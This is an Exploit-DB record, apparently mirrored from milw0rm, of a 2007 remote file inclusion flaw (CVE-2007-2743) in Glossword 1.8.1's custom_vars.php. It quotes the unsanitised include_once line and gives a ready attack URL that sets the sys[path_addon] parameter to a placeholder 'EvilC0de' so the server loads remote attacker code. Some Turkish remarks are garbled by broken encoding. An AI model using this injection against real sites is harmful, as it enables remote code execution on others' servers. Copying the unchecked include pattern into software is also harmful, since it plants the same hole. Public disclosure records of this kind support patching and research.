Glossword 1.8.1 custom_vars.php Remote File Inclusion Vulnerability

2007-05-16T00:00:00
ID EDB-ID:3935
Type exploitdb
Reporter BeyazKurt
Modified 2007-05-16T00:00:00

Description

Glossword 1.8.1 custom_vars.php Remote File Inclusion Vulnerability. CVE-2007-2743. Webapps exploit for php platform

                                        
                                            GlossWord v1.8

ÅŸu script deÄŸil ! --> http://glossword.info/ !

Site : http://sourceforge.net/projects/glossword/

Author : BeyazKurt - B3yazKurt@Hotmail.Com

 

kimse ÅŸeyimde deÄŸil !

Download : http://sourceforge.net/projects/glossword/

include_once($sys['path_addon'].'/multilingual_vars.php');

[path]/custom_vars.php?sys[path_addon]=EvilC0de

# milw0rm.com [2007-05-16]